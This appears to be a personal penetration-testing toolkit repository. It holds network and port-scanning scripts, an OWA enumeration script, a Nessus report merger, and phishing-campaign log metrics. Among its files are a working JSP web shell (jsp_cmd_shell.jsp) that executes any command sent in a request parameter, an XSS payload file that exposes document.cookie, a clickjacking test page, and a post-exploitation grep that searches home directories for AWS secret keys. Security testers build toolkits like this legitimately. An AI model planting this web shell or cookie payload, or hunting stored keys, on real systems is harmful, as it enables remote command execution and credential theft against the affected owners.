├── .gitattributes ├── .gitignore ├── ApachePhishMetrics.sh ├── LinuxPostexGrep.txt ├── README.md ├── VMManage ├── CreateVMSnapshot.sh └── ListVMSnapshots.sh ├── VerifyAzureStorage.ps1 ├── WIP ├── discovery.py └── owa_enum.py ├── XSS.JS ├── framing-test.html ├── hsts-check.py ├── jsp_cmd_shell.jsp ├── nessus_merge.py ├── network_enum.sh ├── network_services_hostlists.sh └── swagger_parse.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | *.sln merge=union 7 | *.csproj merge=union 8 | *.vbproj merge=union 9 | *.fsproj merge=union 10 | *.dbproj merge=union 11 | 12 | # Standard to msysgit 13 | *.doc diff=astextplain 14 | *.DOC diff=astextplain 15 | *.docx diff=astextplain 16 | *.DOCX diff=astextplain 17 | *.dot diff=astextplain 18 | *.DOT diff=astextplain 19 | *.pdf diff=astextplain 20 | *.PDF diff=astextplain 21 | *.rtf diff=astextplain 22 | *.RTF diff=astextplain 23 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ################# 2 | ## Eclipse 3 | ################# 4 | 5 | *.pydevproject 6 | .project 7 | .metadata 8 | bin/ 9 | tmp/ 10 | *.tmp 11 | *.bak 12 | *.swp 13 | *~.nib 14 | local.properties 15 | .classpath 16 | .settings/ 17 | .loadpath 18 | 19 | # External tool builders 20 | .externalToolBuilders/ 21 | 22 | # Locally stored "Eclipse launch configurations" 23 | *.launch 24 | 25 | # CDT-specific 26 | .cproject 27 | 28 | # PDT-specific 29 | .buildpath 30 | 31 | 32 | ################# 33 | ## Visual Studio 34 | ################# 35 | 36 | ## Ignore Visual Studio temporary files, build results, and 37 | ## files generated by popular Visual Studio add-ons. 
38 | 39 | # User-specific files 40 | *.suo 41 | *.user 42 | *.sln.docstates 43 | 44 | # Build results 45 | 46 | [Dd]ebug/ 47 | [Rr]elease/ 48 | x64/ 49 | build/ 50 | [Bb]in/ 51 | [Oo]bj/ 52 | 53 | # MSTest test Results 54 | [Tt]est[Rr]esult*/ 55 | [Bb]uild[Ll]og.* 56 | 57 | *_i.c 58 | *_p.c 59 | *.ilk 60 | *.meta 61 | *.obj 62 | *.pch 63 | *.pdb 64 | *.pgc 65 | *.pgd 66 | *.rsp 67 | *.sbr 68 | *.tlb 69 | *.tli 70 | *.tlh 71 | *.tmp 72 | *.tmp_proj 73 | *.log 74 | *.vspscc 75 | *.vssscc 76 | .builds 77 | *.pidb 78 | *.log 79 | *.scc 80 | 81 | # Visual C++ cache files 82 | ipch/ 83 | *.aps 84 | *.ncb 85 | *.opensdf 86 | *.sdf 87 | *.cachefile 88 | 89 | # Visual Studio profiler 90 | *.psess 91 | *.vsp 92 | *.vspx 93 | 94 | # Guidance Automation Toolkit 95 | *.gpState 96 | 97 | # ReSharper is a .NET coding add-in 98 | _ReSharper*/ 99 | *.[Rr]e[Ss]harper 100 | 101 | # TeamCity is a build add-in 102 | _TeamCity* 103 | 104 | # DotCover is a Code Coverage Tool 105 | *.dotCover 106 | 107 | # NCrunch 108 | *.ncrunch* 109 | .*crunch*.local.xml 110 | 111 | # Installshield output folder 112 | [Ee]xpress/ 113 | 114 | # DocProject is a documentation generator add-in 115 | DocProject/buildhelp/ 116 | DocProject/Help/*.HxT 117 | DocProject/Help/*.HxC 118 | DocProject/Help/*.hhc 119 | DocProject/Help/*.hhk 120 | DocProject/Help/*.hhp 121 | DocProject/Help/Html2 122 | DocProject/Help/html 123 | 124 | # Click-Once directory 125 | publish/ 126 | 127 | # Publish Web Output 128 | *.Publish.xml 129 | *.pubxml 130 | 131 | # NuGet Packages Directory 132 | ## TODO: If you have NuGet Package Restore enabled, uncomment the next line 133 | #packages/ 134 | 135 | # Windows Azure Build Output 136 | csx 137 | *.build.csdef 138 | 139 | # Windows Store app package directory 140 | AppPackages/ 141 | 142 | # Others 143 | sql/ 144 | *.Cache 145 | ClientBin/ 146 | [Ss]tyle[Cc]op.* 147 | ~$* 148 | *~ 149 | *.dbmdl 150 | *.[Pp]ublish.xml 151 | *.pfx 152 | *.publishsettings 153 | 154 | # RIA/Silverlight 
projects 155 | Generated_Code/ 156 | 157 | # Backup & report files from converting an old project file to a newer 158 | # Visual Studio version. Backup files are not needed, because we have git ;-) 159 | _UpgradeReport_Files/ 160 | Backup*/ 161 | UpgradeLog*.XML 162 | UpgradeLog*.htm 163 | 164 | # SQL Server files 165 | App_Data/*.mdf 166 | App_Data/*.ldf 167 | 168 | ############# 169 | ## Windows detritus 170 | ############# 171 | 172 | # Windows image file caches 173 | Thumbs.db 174 | ehthumbs.db 175 | 176 | # Folder config file 177 | Desktop.ini 178 | 179 | # Recycle Bin used on file shares 180 | $RECYCLE.BIN/ 181 | 182 | # Mac crap 183 | .DS_Store 184 | 185 | 186 | ############# 187 | ## Python 188 | ############# 189 | 190 | *.py[co] 191 | 192 | # Packages 193 | *.egg 194 | *.egg-info 195 | dist/ 196 | build/ 197 | eggs/ 198 | parts/ 199 | var/ 200 | sdist/ 201 | develop-eggs/ 202 | .installed.cfg 203 | 204 | # Installer logs 205 | pip-log.txt 206 | 207 | # Unit test / coverage reports 208 | .coverage 209 | .tox 210 | 211 | #Translations 212 | *.mo 213 | 214 | #Mr Developer 215 | .mr.developer.cfg 216 | -------------------------------------------------------------------------------- /ApachePhishMetrics.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | ##Justin Soderbeg 5 | # using this: 6 | # put all the apache logs you want to processes into the same directory 7 | # 'cd' into that directory and run the script 8 | # should output .txt files containing the information needed 9 | 10 | 11 | #total hits to the first page 12 | echo "#These are the unique visits to the site" > site_metrics.txt 13 | echo "
" >> site_metrics.txt 14 | less ssl_access_log* | grep "/ " | cut -d '-' -f 1 | sort -r | uniq -c | grep -v -E '10.8.161.*|10.18.28.*' >> site_metrics.txt 15 | 16 | 17 | 18 | #unique visits to the sites main survey page 19 | echo "" >> site_metrics.txt 20 | echo "" >> site_metrics.txt 21 | echo "" >> site_metrics.txt 22 | echo "#These are the unique visits to the site that started the survey" >> site_metrics.txt 23 | echo "
" >> site_metrics.txt 24 | less ssl_access_log* | grep "survey.php" | cut -d '-' -f 1 | sort -r | uniq -c | grep -v -E '10.8.161.*|10.18.28.*' >> site_metrics.txt 25 | 26 | 27 | 28 | #unique visits to the thank you page 29 | echo "" >> site_metrics.txt 30 | echo "" >> site_metrics.txt 31 | echo "" >> site_metrics.txt 32 | echo "#These are the unique visits that finished the survey" >> site_metrics.txt 33 | echo "
" >> site_metrics.txt 34 | less ssl_access_log* | grep "thankyou.php" | cut -d '-' -f 1 | sort -r | uniq -c | grep -v -E '10.8.161.*|10.18.28.*' >> site_metrics.txt 35 | 36 | -------------------------------------------------------------------------------- /LinuxPostexGrep.txt: -------------------------------------------------------------------------------- 1 | # Find stored aws keys from user home dirs 2 | grep -E "((access|secret)\-*\_*key)" -R . 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Most of these are written for Kali 2 | 3 | 4 | some of these are a work in progress and do not function as-is because they were completed elsewhere and not re committed or I just gave up on them due to other time commitments. Feel free to fix/issue pull requests for anything. I make no promises for functionality or support. 5 | -------------------------------------------------------------------------------- /VMManage/CreateVMSnapshot.sh: -------------------------------------------------------------------------------- 1 | 2 | #!/bin/sh 3 | 4 | # Creates a snapshot of specific in VirtualBox. The name is the timestamp. 
5 | # this was created to give an easy way to repeat VM snapshots of a single vm during a course 6 | 7 | 8 | FORMATTED_DATE="PWK-$(date | awk '{gsub(/[ \t]/,"-");print}')-snapshot" 9 | 10 | # Modify VM_IDS of the specific vm you want to create a snapshot of 11 | # found with `VBoxManage list vm` 12 | VM_IDS="c31f7321-6287-49fe-8f3e-31d71cf55565" 13 | 14 | 15 | COMMAND="VBoxManage snapshot "$VM_IDS" take "$FORMATTED_DATE" --live" 16 | echo $COMMAND 17 | eval $COMMAND 18 | logger "From $0 - Created VirtualBox Snapshot $FORMATTED_DATE for VM $NEXT" 19 | echo "Created VirtualBox Snapshot $FORMATTED_DATE for VM $NEXT" 20 | printf "\n\n" 21 | -------------------------------------------------------------------------------- /VMManage/ListVMSnapshots.sh: -------------------------------------------------------------------------------- 1 | 2 | #!/bin/sh 3 | 4 | # Lists snapshots of All VMs in VirtualBox. 5 | 6 | 7 | echo "These are the VMs that will be listed" 8 | VBoxManage list vms 9 | printf "\n" 10 | 11 | #VM_IDS="c31f7321-6287-49fe-8f3e-31d71cf55565" 12 | for vm in `(VBoxManage list vms | cut -d "{" -f2 | cut -d "}" -f1)`; do 13 | COMMAND="VBoxManage snapshot "$vm" list" 14 | echo $COMMAND 15 | eval $COMMAND 16 | logger "From $0 - Listin VirtualBox Snapshots for PWK VM" 17 | printf "\n" 18 | done 19 | -------------------------------------------------------------------------------- /VerifyAzureStorage.ps1: -------------------------------------------------------------------------------- 1 | #Justin Soderberg 2 | #quick wrapper for the Azure powershell tools to verify if a connection string is valid 3 | 4 | Param( 5 | [Parameter(Mandatory=$true)] 6 | [string]$StorageAccountName, 7 | [Parameter(Mandatory=$true)] 8 | [string]$StorageAccountKey 9 | ) 10 | if (Get-Module -ListAvailable -Name Azure){ 11 | Try{ 12 | $Context = New-AzureStorageContext -StorageAccountName $StorageAccountName -StorageAccountKey $StorageAccountKey 13 | Get-AzureStorageContainer -Context $Context 14 | 
} 15 | Catch{ 16 | Write-Host "An errors occured verify your name and key" 17 | } 18 | }else{ 19 | Write-Host "Azure Module does not exist" 20 | } 21 | -------------------------------------------------------------------------------- /WIP/discovery.py: -------------------------------------------------------------------------------- 1 | #A blanket discovery script to help with enumberation 2 | 3 | 4 | 5 | 6 | #TODOs 7 | #nmap ping scan 8 | #Metasploit UDP Probe 9 | #nmap -T4 -sS -sV -sC -T5 -PP -PE -PM -PI -PA20,53,80,113,443,5060,10043 --host-timeout=300m -O --max-rtt-timeout=3000ms --initial-rtt-timeout=1000ms --min-rtt-timeout=1000ms --max-retries=2 --stats-every 10s --traceroute --min-hostgroup=64 -PS1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,873,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4672,4679,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8086-8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,9000,9002,9010,9080-9081,9084,9090,9099-9100,9111,9152,92
00,9256,9390-9391,9495,9788,9809-9815,9855,9999-10001,10008,10050-10051,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50500-50504,52302,52869,55553,57772,62078,62514,65535 --min-rate=500 -PU56838 -iL -p1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,873,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4672,4679,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8086-8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,9000,9002,9010,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9390-9391,9495,9788,9809-9815,9855,9999-10001,10008,10050-1005
1,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823,46824,47001,47002,48080,48899,49152,50000-50004,50013,50500,50504,52302,52869,55553,57772,62078,62514,65535 --script smb-security-mode, ssl-cipher-enum, "discovery", "safe", "vuln" 10 | 11 | #Metasploit SMB Share Enum 12 | #Metasploit SMB User Enum 13 | #SNMP scanner (either metasploit,SNMP walk, onesixtyone) 14 | #Anonymous FTP Check 15 | #SSL Scan 16 | 17 | ###### SCRIPT ############ 18 | 19 | #pf = /tmp/nmap-ping-$(date +%Y%m%d) 20 | #muf = /tmp/msf-udp-$(date +%Y%m%d) 21 | 22 | 23 | #if (uuid != 0) do 24 | # print "please run as sudo" 25 | # exit(0) 26 | #fi 27 | 28 | #nmap -sn $1 > $pf 29 | 30 | 31 | import python-nmap 32 | 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /WIP/owa_enum.py: -------------------------------------------------------------------------------- 1 | #!/bin/python3 2 | 3 | # Author: Justin Soderberg 4 | # Prompted idea taken from \ 5 | # https://www.peerlyst.com/posts/writing-a-simple-owa-enumeration-script-secgroundzero 6 | 7 | import argparse 8 | import requests 9 | 10 | 11 | # List of OWA discovery paths to check 12 | owaDiscoveryPaths = ['/autodiscover/autodiscover.xml', '/Autodiscover/Autodiscover.xml', '/owa/auth/logon.aspx'] 13 | 14 | # List of subdomains to check 15 | subdomains = ['www', 'autodiscover', 'mail', 'exchange', 'webmail'] 16 | 17 | # Check if a URL returns a successful HTTP status code 18 | def checkURL(url): 19 | try: 20 | response = requests.get(url) 21 | return response.status_code == 200 22 | except: 23 | return False 24 | 25 | # 
Check if a live OWA or Exchange instance exists for the given domain 26 | def checkDomain(domain): 27 | for sub in subdomains: 28 | for path in owaDiscoveryPaths: 29 | # Construct the URL to check 30 | url = f'https://{sub}.{domain}{path}' 31 | if checkURL(url): 32 | print(f'[+] {url} exists!') 33 | return True 34 | return False 35 | 36 | def main(): 37 | # Parse command-line arguments 38 | parser = argparse.ArgumentParser(description='Check for a live OWA or Exchange instance') 39 | parser.add_argument('-d', '--domain', type=str, help='Add a domain') 40 | args = parser.parse_args() 41 | 42 | # Check the provided domain for a live OWA or Exchange instance 43 | domain = args.domain 44 | if checkDomain(domain): 45 | print(f'Live OWA or Exchange instance found for {domain}!') 46 | else: 47 | print(f'No live OWA or Exchange instance found for {domain}!') 48 | 49 | if __name__ == "__main__": 50 | main() 51 | -------------------------------------------------------------------------------- /XSS.JS: -------------------------------------------------------------------------------- 1 | /* This file is based on the file from http://ha.ckers.org/xss.js and xss.rocks/xss.js*/ 2 | 3 | document.write ("This is remote text via XSS.JS located on the github of Justin Soderberg " + document.cookie); 4 | alert("Remote XSS Inclusion " + document.cookie); 5 | -------------------------------------------------------------------------------- /framing-test.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Clickjacking Successful 4 | 5 | 6 |

This page is vulnerable to clickjacking

7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /hsts-check.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # may need to pip install requests if it's a clean system 4 | 5 | import requests 6 | 7 | sites = [ 8 | ('Facebook', 'https://www.facebook.com') 9 | ] 10 | 11 | for site in sites: 12 | r = requests.get(site[1], headers={ 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0'}) 14 | if 'strict-transport-security' in r.headers: 15 | print(site[0] + ': Headers Present [' + 16 | r.headers['strict-transport-security'] + ']') 17 | else: 18 | print(site[0] + ': No HSTS Headers Present') 19 | -------------------------------------------------------------------------------- /jsp_cmd_shell.jsp: -------------------------------------------------------------------------------- 1 | <%-- this should work but i don't guarantee anything and am not responsible for where this is used--%> 2 | 3 | <%@ page import="java.util.*,java.io.*"%> 4 | 5 | Commands with JSP 6 |

7 | 8 | 9 |
10 |
11 | <%
12 | if (request.getParameter("command") != null) {
13 |         out.println("Command: " + request.getParameter("command") + "
"); 14 | Process p = Runtime.getRuntime().exec(request.getParameter("command")); 15 | OutputStream os = p.getOutputStream(); 16 | InputStream in = p.getInputStream(); 17 | DataInputStream dis = new DataInputStream(in); 18 | String disr = dis.readLine(); 19 | while ( disr != null ) { 20 | out.println(disr); 21 | disr = dis.readLine(); 22 | } 23 | } 24 | %> 25 |
26 | 27 | -------------------------------------------------------------------------------- /nessus_merge.py: -------------------------------------------------------------------------------- 1 | # based off: https://gist.github.com/mastahyeti/2720173 2 | #only slight modifications 3 | 4 | import os 5 | import shutil 6 | import xml.etree.ElementTree as etree 7 | 8 | first = 1 9 | for fileName in os.listdir("."): 10 | if ".nessus" in fileName: 11 | print(":: Parsing", fileName) 12 | if first: 13 | mainTree = etree.parse(fileName) 14 | report = mainTree.find('Report') 15 | report.attrib['name'] = 'Merged Report' 16 | first = 0 17 | else: 18 | tree = etree.parse(fileName) 19 | for host in tree.findall('.//ReportHost'): 20 | existing_host = report.find(".//ReportHost[@name='" + host.attrib['name'] + "']") 21 | if not existing_host: 22 | print "adding host: " + host.attrib['name'] 23 | report.append(host) 24 | else: 25 | for item in host.findall('ReportItem'): 26 | if not existing_host.find("ReportItem[@port='" + item.attrib['port'] + "'][@pluginID='" + 27 | item.attrib['pluginID'] + "']"): 28 | print "adding finding: " + item.attrib['port'] + ":" + item.attrib['pluginID'] 29 | existing_host.append(item) 30 | print(":: => done.") 31 | 32 | if "merged_nessus_report" in os.listdir("."): 33 | shutil.rmtree("merged_nessus_report") 34 | 35 | os.mkdir("merged_nessus_report") 36 | mainTree.write("merged_nessus_report/merged_report.nessus", encoding="utf-8", xml_declaration=True) 37 | -------------------------------------------------------------------------------- /network_enum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Author: Justin Soderbeg 3 | # network services script 4 | # network_enum.sh
5 | 6 | # this requires propecia.c: https://packetstormsecurity.com/files/14232/propecia.c.html 7 | 8 | # Make the directories 9 | mkdir -p ~/$1/internal/scan/services/ 10 | mkdir -p ~/$1/internal/scan/nmap/hosts/ 11 | 12 | 13 | 14 | ###################### 15 | # Find Windows Hosts # 16 | ###################### 17 | echo "Scanning for windows hosts." 18 | WIN_SMB_COUNTER=0 19 | while [ $WIN_SMB_COUNTER -lt 254 ]; do 20 | propecia $2.$WIN_SMB_COUNTER 445 >> ~/$1/internal/scan/services/windows_SMB_hosts 21 | let WIN_SMB_COUNTER++ 22 | done 23 | echo "Done scanning for windows smb hosts. RDP is next." 24 | 25 | ###################### 26 | # Find Windows RDP Hosts # 27 | ###################### 28 | echo "Scanning for windows RDP hosts." 29 | WIN_RDP_COUNTER=0 30 | while [ $WIN_RDP_COUNTER -lt 254 ]; do 31 | propecia $2.$WIN_RDP_COUNTER 3389 >> ~/$1/internal/scan/services/windows_RDP_hosts 32 | let WIN_RDP_COUNTER++ 33 | done 34 | echo "Done scanning for windows RDP hosts. FTP is next." 35 | 36 | ################## 37 | # Find FTP Hosts # 38 | ################## 39 | FTP_COUNTER=0 40 | while [ $FTP_COUNTER -lt 254 ]; do 41 | propecia $2.$FTP_COUNTER 21 >> ~/$1/internal/scan/services/ftp_hosts 42 | let FTP_COUNTER++ 43 | done 44 | echo "Done scanning for FTP hosts. SunRPC is next." 45 | 46 | 47 | ##################### 48 | # Find SunRPC Hosts # 49 | ##################### 50 | SRPC_COUNTER=0 51 | while [ $SRPC_COUNTER -lt 254 ]; do 52 | propecia $2.$SRPC_COUNTER 111 >> ~/$1/internal/scan/services/sunrpc_hosts 53 | let SRPC_COUNTER++ 54 | done 55 | 56 | echo "Done scanning for SunRPC hosts. Telnet is next." 57 | 58 | 59 | ##################### 60 | # Find Telnet Hosts # 61 | ##################### 62 | TEL_COUNTER=0 63 | while [ $TEL_COUNTER -lt 254 ]; do 64 | propecia $2.$TEL_COUNTER 23 >> ~/$1/internal/scan/services/telnet_hosts 65 | let TEL_COUNTER++ 66 | done 67 | echo "Done scanning for Telnet hosts. Databases are next." 
68 | 69 | 70 | ################## 71 | # Find Databases # 72 | ################## 73 | MSSQL_COUNTER=0 74 | while [ $MSSQL_COUNTER -lt 254 ]; do 75 | propecia $2.$MSSQL_COUNTER 1433 >> ~/$1/internal/scan/services/mssql_hosts 76 | let MSSQL_COUNTER++ 77 | done 78 | 79 | ORA_COUNTER=0 80 | while [ $ORA_COUNTER -lt 254 ]; do 81 | propecia $2.$ORA_COUNTER 1521 >> ~/$1/internal/scan/services/oracle_hosts 82 | let ORA_COUNTER++ 83 | done 84 | 85 | 86 | MY_COUNTER=0 87 | while [ $MY_COUNTER -lt 254 ]; do 88 | propecia $2.$MY_COUNTER 3306 >> ~/$1/internal/scan/services/mysql_hosts 89 | let MY_COUNTER++ 90 | done 91 | echo "Done scanning for Databases. Scanning for Web Servers Next" 92 | 93 | ################ 94 | # Find HTTP 80 # 95 | ################ 96 | HTTP_80_COUNTER=0 97 | while [ $HTTP_80_COUNTER -lt 254 ]; do 98 | propecia $2.$HTTP_80_COUNTER 80 >> ~/$1/internal/scan/services/http_80_hosts 99 | let HTTP_80_COUNTER++ 100 | done 101 | ################## 102 | # Find HTTP 8080 # 103 | ################## 104 | HTTP_8080_COUNTER=0 105 | while [ $HTTP_8080_COUNTER -lt 254 ]; do 106 | propecia $2.$HTTP_8080_COUNTER 8080 >> ~/$1/internal/scan/services/http_8080_hosts 107 | let HTTP_8080_COUNTER++ 108 | done 109 | ################# 110 | # Find HTTP 443 # 111 | ################# 112 | HTTP_443_COUNTER=0 113 | while [ $HTTP_443_COUNTER -lt 254 ]; do 114 | propecia $2.$HTTP_443_COUNTER 443 >> ~/$1/internal/scan/services/http_443_hosts 115 | let HTTP_443_COUNTER++ 116 | done 117 | ################## 118 | # Find HTTP 8443 # 119 | ################## 120 | HTTP_8443_COUNTER=0 121 | while [ $HTTP_8443_COUNTER -lt 254 ]; do 122 | propecia $2.$HTTP_8443_COUNTER 8443 >> ~/$1/internal/scan/services/http_8443_hosts 123 | let HTTP_8443_COUNTER++ 124 | done 125 | 126 | ###################### 127 | # Merge nmap targets # 128 | ###################### 129 | cat ~/$1/internal/scan/services/windows_SMB_hosts ~/$1/internal/scan/services/ftp_hosts ~/$1/internal/scan/services/sunrpc_hosts 
~/$1/internal/scan/services/windows_RDP_hosts \ 130 | ~/$1/internal/scan/services/mssql_hosts ~/$1/internal/scan/services/oracle_hosts ~/$1/internal/scan/services/mysql_hosts \ 131 | ~/$1/internal/scan/services/http_80_hosts ~/$1/internal/scan/services/http_8080_hosts ~/$1/internal/scan/services/http_443_hosts ~/$1/internal/scan/services/http_8443_hosts >> ~/$1/internal/scan/nmap/nmap_targets_dup 132 | 133 | ############################ 134 | # Deduplicate nmap targets # 135 | ############################ 136 | sort ~/$1/internal/scan/nmap/nmap_targets_dup | uniq > ~/$1/internal/scan/nmap/nmap_targets_deduplicated 137 | 138 | 139 | ############################### 140 | # Ok, let's do the NMAP files # 141 | ############################### 142 | 143 | for x in `cat ~/$1/internal/scan/nmap/nmap_targets_deduplicated` ; do nmap -sV -O $x > ~/$1/internal/scan/nmap/hosts/$x ; done 144 | echo "Done with Windows." 145 | echo " " 146 | echo " " 147 | echo "Done, now check your results." 148 | -------------------------------------------------------------------------------- /network_services_hostlists.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Author: Justin Soderberg 3 | # This script discovers hosts running specific servers and outputs a host list to a file for each service 4 | # This all relies on standard nmap discovery 5 | 6 | # free for use and modification 7 | 8 | bashversion=$(printf "$BASH_VERSION" | cut -d "." 
-f1) 9 | 10 | # check that we are running in bash >= 4 so that associative arrays work 11 | if ((bashversion < 4)); then 12 | printf "Must be running BASH >= 4.0" 13 | exit 14 | fi 15 | 16 | #Check arguments 17 | if (($# != 1)); then 18 | printf "Usage: %s 10.1.1.0/24" "$0" 19 | exit 20 | fi 21 | 22 | # Check Privs 23 | if (($EUID != 0)); then 24 | printf "Run me as Root" 25 | exit 26 | fi 27 | 28 | # declare an associative array 29 | declare -A servicesTCP 30 | declare -A servicesUDP 31 | 32 | # declare services in the arrays 33 | ### 34 | # DECLARE TCP services 35 | ### 36 | # scan for http port 80 37 | servicesTCP[http80]=80 38 | # scan for http port 8080 39 | servicesTCP[http8080]=8080 40 | # scan for https port 443 41 | servicesTCP[https443]=443 42 | # scan for https port 8443 43 | servicesTCP[http8443]=8443 44 | # scan for ftp 45 | servicesTCP[ftp]=21 46 | # scan for ssh 47 | servicesTCP[ssh]=22 48 | # scan for telnet 49 | servicesTCP[telnet]=23 50 | # scan for smtp 51 | servicesTCP[smtp]=25 52 | # scan for smtp using ssl 53 | servicesTCP[smtpssl]=465 54 | # scan for POP 55 | servicesTCP[pop3]=110 56 | # scan for SMB 57 | servicesTCP[smb]=445 58 | 59 | ### 60 | # DECLARE UDP services 61 | ### 62 | # scan for snmp 63 | servicesUDP[snmp]=161 64 | 65 | # make the test directory in whatever folder you are in 66 | # eventually i want to make this more elegant but for now it works. 
67 | mkdir -p ./HostServices/ 68 | workingpath="./HostServices/" 69 | 70 | #Text Colors 71 | RED='\033[0;31m' 72 | GREEN='\033[0;32m' 73 | YELLOW='\033[0;33m' 74 | END='\033[0;0m' 75 | BOLD='\033[0;1m' 76 | ENDBOLD='\033[21m' 77 | 78 | for service in "${!servicesTCP[@]}"; do 79 | printf $YELLOW"Testing the %s TCP service\n"$END "$service" 80 | filetemp=$workingpath$service"_hosts.gnmap" 81 | filehosts=$workingpath$service"_hosts.txt" 82 | nmap -p ${servicesTCP[$service]} $1 --open -oG $filetemp 83 | cat $filetemp | cut -d " " -f2 | sort -u | grep -v "Nmap" >$filehosts 84 | printf $GREEN"Testing of the %s TCP service is Complete\n" "$service" 85 | printf "Check the file:"$BOLD" %s"$ENDBOLD$GREEN" for a list of hosts with the service active\n\n"$END "$filehosts" 86 | 87 | done 88 | 89 | for service in "${!servicesUDP[@]}"; do 90 | printf $YELLOW"Testing the %s UDP service\n"$END "$service" 91 | filetemp=$workingpath$service"_hosts.gnmap" 92 | filehosts=$workingpath$service"_hosts.txt" 93 | nmap -sU -p ${servicesUDP[$service]} $1 --open -oG $filetemp 94 | cat $filetemp | cut -d " " -f2 | sort -u | grep -v "Nmap" >$filehosts 95 | printf $GREEN"Testing of the %s UDP service is Complete\n" "$service" 96 | printf "Check the file: "$BOLD" %s"$ENDBOLD$GREEN" for a list of hosts with the service active\n\n"$END "$filehosts" 97 | done 98 | -------------------------------------------------------------------------------- /swagger_parse.py: -------------------------------------------------------------------------------- 1 | #### Author: Justin Soderberg 2 | #### 3 | ## The goal of this script is to parse a swagger.json file and pull out the API path and the HTTP Method 4 | ## then just place it into a table in the terminal. Designed to quickly identify and target services. 
